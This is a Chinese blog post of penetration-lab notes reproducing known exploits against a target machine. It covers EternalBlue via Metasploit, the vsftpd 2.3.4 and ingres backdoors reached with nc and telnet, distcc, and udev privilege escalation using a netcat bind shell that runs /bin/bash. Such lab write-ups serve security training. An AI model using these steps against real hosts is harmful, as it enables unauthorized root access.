漏洞复现

1. 永恒之蓝(445端口)

首先先搜索ms17_010

内网渗透 day13-漏洞复现

use 2   选择编号二的

内网渗透 day13-漏洞复现

查看需要的参数

内网渗透 day13-漏洞复现

设置目标ip地址

内网渗透 day13-漏洞复现

run   启动攻击成功

内网渗透 day13-漏洞复现

2. 手动微笑漏洞(21端口 vsftpd2.3.4版本)

扫描到对方打开21号端口并且版本为vsftpd 2.3.4的

内网渗透 day13-漏洞复现

ftp跟上目标机的ip地址,帐号为root:)  密码为root , 他就会停在那边

(或者search vsftpd直接利用漏洞)

内网渗透 day13-漏洞复现

重新开个终端用nc连接该ip地址的6200端口(成功连接,并且是root权限)

内网渗透 day13-漏洞复现

3. ingres数据库DBMS后门(1524端口)

扫描端口发现有1524端口的开放

内网渗透 day13-漏洞复现

直接telnet进行连接该ip的1524端口(直接获得root用户权限)

内网渗透 day13-漏洞复现

4. distcc漏洞(3632)

msf搜索distcc,并进入该模块

内网渗透 day13-漏洞复现

查看所要参数,并设置目标ip

内网渗透 day13-漏洞复现

启用失败(跟环境有关,靶机需要开启3632端口)

内网渗透 day13-漏洞复现

5. udev提权

searchsploit udev  +  locate        搜索加定位

内网渗透 day13-漏洞复现

进入shell

cat /proc/net/netlink -->记录udev pid

内网渗透 day13-漏洞复现

切换到/tmp文件下

内网渗透 day13-漏洞复现

touch run

echo '#!/bin/bash'> run

echo '/bin/netcat -Ivvp 4445 -e /bin/bash' >> run

内网渗透 day13-漏洞复现

将文件移动到/var/www/html文件夹下

内网渗透 day13-漏洞复现

下载并且编译gcc udev.c -0 udev

内网渗透 day13-漏洞复现

./udev pid

内网渗透 day13-漏洞复现

连接成功

内网渗透 day13-漏洞复现

相关文章:

  • 2021-04-09
  • 2021-08-27
  • 2021-07-21
  • 2021-05-07
  • 2021-09-27
  • 2021-09-29
  • 2021-11-11
  • 2021-11-28
猜你喜欢
  • 2021-05-28
  • 2021-09-28
  • 2021-11-03
  • 2021-06-19
  • 2021-04-15
  • 2021-06-14
  • 2022-12-23
相关资源
相似解决方案